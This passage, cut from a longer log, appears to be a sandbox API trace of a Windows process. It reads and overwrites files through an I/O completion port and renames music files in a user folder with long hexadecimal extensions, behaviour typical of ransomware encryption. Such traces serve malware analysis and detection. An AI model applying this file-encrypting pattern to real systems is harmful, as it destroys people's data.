nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.411] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.417] WriteFile (in: hFile=0x32c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.417] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.425] WriteFile (in: hFile=0x32c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.426] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.434] WriteFile (in: hFile=0x32c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.435] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.472] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x7a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.473] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.479] WriteFile (in: hFile=0x32c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.480] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.489] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x6000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.489] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.495] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.496] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.503] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x7c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.504] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.509] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.510] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.521] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.522] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.528] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.529] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.579] ReadFile (in: hFile=0x32c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 0x0 [0124.596] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.597] WriteFile (in: hFile=0x33c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0124.598] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.609] WriteFile (in: hFile=0x32c, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0124.610] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.616] WriteFile (in: hFile=0x32c, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0124.616] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.622] WriteFile (in: hFile=0x32c, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0124.622] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.629] WriteFile (in: hFile=0x334, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0124.629] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.637] WriteFile (in: hFile=0x334, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0124.638] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.644] WriteFile (in: hFile=0x334, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0124.644] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.650] WriteFile (in: hFile=0x334, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0x4400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0124.650] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.662] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0124.663] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\0tVeU 3iTyrR -c.mp3", lpString2=".2DB22198FA8245305859CEDEE06317012B10B655F4ADB18AD428491F31BC5F62" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\0tVeU 3iTyrR -c.mp3.2DB22198FA8245305859CEDEE06317012B10B655F4ADB18AD428491F31BC5F62") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\0tVeU 3iTyrR -c.mp3.2DB22198FA8245305859CEDEE06317012B10B655F4ADB18AD428491F31BC5F62" [0124.663] GetProcessHeap () returned 0x600000 [0124.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x144) returned 0x33699a0 [0124.663] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x24fff60, FileInformation=0x33699a0, Length=0x144, FileInformationClass=0xa) returned 0x0 [0124.664] CloseHandle (hObject=0x328) returned 1 [0124.665] GetProcessHeap () returned 0x600000 [0124.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.665] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.668] ReadFile (in: hFile=0x31c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.669] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.670] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x336e010, ReturnLength=0x24fff70) returned 0x0 [0124.670] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\-hq3- Z8.wav", lpString2=".8F0A0101B0C0853CA9EF05E51E6C99C759A17EA290DA0C41704E0DDB0E667F0C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\-hq3- Z8.wav.8F0A0101B0C0853CA9EF05E51E6C99C759A17EA290DA0C41704E0DDB0E667F0C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\-hq3- Z8.wav.8F0A0101B0C0853CA9EF05E51E6C99C759A17EA290DA0C41704E0DDB0E667F0C" [0124.670] GetProcessHeap () returned 0x600000 [0124.670] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x178) returned 0x6d5c88 [0124.670] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x6d5c88, Length=0x178, FileInformationClass=0xa) returned 0x0 [0124.671] CloseHandle (hObject=0x31c) returned 1 [0124.672] GetProcessHeap () returned 0x600000 [0124.672] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.673] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.678] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.679] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.679] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0124.680] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\N1HKAQQ4Fz9a.m4a", lpString2=".3BEC1A07551AAED8867ABACAD62F8483F88BA826D1A93E08EC48FEDEF73FB71F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\N1HKAQQ4Fz9a.m4a.3BEC1A07551AAED8867ABACAD62F8483F88BA826D1A93E08EC48FEDEF73FB71F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\N1HKAQQ4Fz9a.m4a.3BEC1A07551AAED8867ABACAD62F8483F88BA826D1A93E08EC48FEDEF73FB71F" [0124.680] GetProcessHeap () returned 0x600000 [0124.680] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x180) returned 0x6d5e10 [0124.680] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x6d5e10, Length=0x180, FileInformationClass=0xa) returned 0x0 [0124.681] CloseHandle (hObject=0x31c) returned 1 [0124.681] GetProcessHeap () returned 0x600000 [0124.681] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.681] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.684] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.684] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.685] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0124.686] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PLmD7j9ir_qeg.wav", lpString2=".F7C398BA137E86399827A9FCE2A9E955FD7DD9A4002926772886B640087EB047" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PLmD7j9ir_qeg.wav.F7C398BA137E86399827A9FCE2A9E955FD7DD9A4002926772886B640087EB047") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PLmD7j9ir_qeg.wav.F7C398BA137E86399827A9FCE2A9E955FD7DD9A4002926772886B640087EB047" [0124.686] GetProcessHeap () returned 0x600000 [0124.686] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x182) returned 0x3150038 [0124.686] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3150038, Length=0x182, FileInformationClass=0xa) returned 0x0 [0124.687] CloseHandle (hObject=0x31c) returned 1 [0124.687] GetProcessHeap () returned 0x600000 [0124.687] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.687] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.690] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.690] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.691] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0124.691] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PXLHKJzLSE2UqSQL.wav", lpString2=".14F761758A8B0363DEB865B7DEA5C03487E44E8B968CABFA288D416F409A8E37" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PXLHKJzLSE2UqSQL.wav.14F761758A8B0363DEB865B7DEA5C03487E44E8B968CABFA288D416F409A8E37") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PXLHKJzLSE2UqSQL.wav.14F761758A8B0363DEB865B7DEA5C03487E44E8B968CABFA288D416F409A8E37" [0124.691] GetProcessHeap () returned 0x600000 [0124.691] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x188) returned 0x314fb70 [0124.692] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x314fb70, Length=0x188, FileInformationClass=0xa) returned 0x0 [0124.692] CloseHandle (hObject=0x31c) returned 1 [0124.693] GetProcessHeap () returned 0x600000 [0124.693] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.693] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.699] ReadFile (in: hFile=0x334, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.699] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.700] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0124.700] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\v6Rl-DRR36udQvyJ9.mp3", lpString2=".786A5756F663F0E45ED371E2200EFD56CDE8FA6924BD7F708F2C6FC6468B0869" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\v6Rl-DRR36udQvyJ9.mp3.786A5756F663F0E45ED371E2200EFD56CDE8FA6924BD7F708F2C6FC6468B0869") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\v6Rl-DRR36udQvyJ9.mp3.786A5756F663F0E45ED371E2200EFD56CDE8FA6924BD7F708F2C6FC6468B0869" [0124.700] GetProcessHeap () returned 0x600000 [0124.700] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x168) returned 0x315f070 [0124.701] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x24fff60, FileInformation=0x315f070, Length=0x168, FileInformationClass=0xa) returned 0x0 [0124.701] CloseHandle (hObject=0x334) returned 1 [0124.702] GetProcessHeap () returned 0x600000 [0124.702] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.702] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.712] ReadFile (in: hFile=0x334, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.712] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.713] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0124.713] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\3dbK.mp3", lpString2=".69F174F897BBE4C2C190AA194DE4028AEBFAF1E387CA0D12D77DCA52378C2F3A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\3dbK.mp3.69F174F897BBE4C2C190AA194DE4028AEBFAF1E387CA0D12D77DCA52378C2F3A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\3dbK.mp3.69F174F897BBE4C2C190AA194DE4028AEBFAF1E387CA0D12D77DCA52378C2F3A" [0124.714] GetProcessHeap () returned 0x600000 [0124.714] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, 